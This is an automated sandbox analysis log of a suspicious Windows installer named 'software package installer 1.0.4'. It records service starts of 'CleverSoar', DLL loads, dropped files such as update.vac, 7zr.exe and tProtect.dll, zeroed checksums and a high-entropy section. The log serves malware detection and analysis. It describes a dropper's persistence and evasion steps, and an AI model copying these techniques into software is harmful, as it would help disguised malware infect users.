Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeStatic file information: File size 5694753 > 1048576
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1801210662.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1800990919.0000000003840000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004057D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_004057D0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeStatic PE information: real checksum: 0x0 should be: 0x56ef0c
Source: update.vac.1.drStatic PE information: real checksum: 0x0 should be: 0x376862
Source: updat4.vac.6.drStatic PE information: real checksum: 0x0 should be: 0x376862
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x34399d
Source: update.vac.6.drStatic PE information: real checksum: 0x0 should be: 0x376862
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x34399d
Source: tProtect.dll.12.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeStatic PE information: section name: .didata
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.1.drStatic PE information: section name: .00cfg
Source: update.vac.1.drStatic PE information: section name: .voltbl
Source: update.vac.1.drStatic PE information: section name: .j)q
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.drStatic PE information: section name: .didata
Source: 7zr.exe.6.drStatic PE information: section name: .sxdata
Source: update.vac.6.drStatic PE information: section name: .00cfg
Source: update.vac.6.drStatic PE information: section name: .voltbl
Source: update.vac.6.drStatic PE information: section name: .j)q
Source: is-7F262.tmp.6.drStatic PE information: section name: .xdata
Source: updat4.vac.6.drStatic PE information: section name: .00cfg
Source: updat4.vac.6.drStatic PE information: section name: .voltbl
Source: updat4.vac.6.drStatic PE information: section name: .j)q
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA6750B push ecx; ret 6_2_6CA6751E
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C910F00 push ss; retn 0001h6_2_6C910F0A
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CB34F10 push eax; ret 6_2_6CB34F2E
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA999F4 push 004AC35Ch; ret 6_2_6CA99A0E
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CB35290 push eax; ret 6_2_6CB352BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003845F4 push 0042C35Ch; ret 10_2_0038460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0041FB10 push eax; ret 10_2_0041FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0041FE90 push eax; ret 10_2_0041FEBE
Source: update.vac.1.drStatic PE information: section name: .j)q entropy: 7.186767136264165
Source: update.vac.6.drStatic PE information: section name: .j)q entropy: 7.186767136264165
Source: updat4.vac.6.drStatic PE information: section name: .j)q entropy: 7.186767136264165
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-ONGLN.tmp\update.vacJump to dropped file
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeFile created: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\is-7F262.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-ONGLN.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeFile created: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
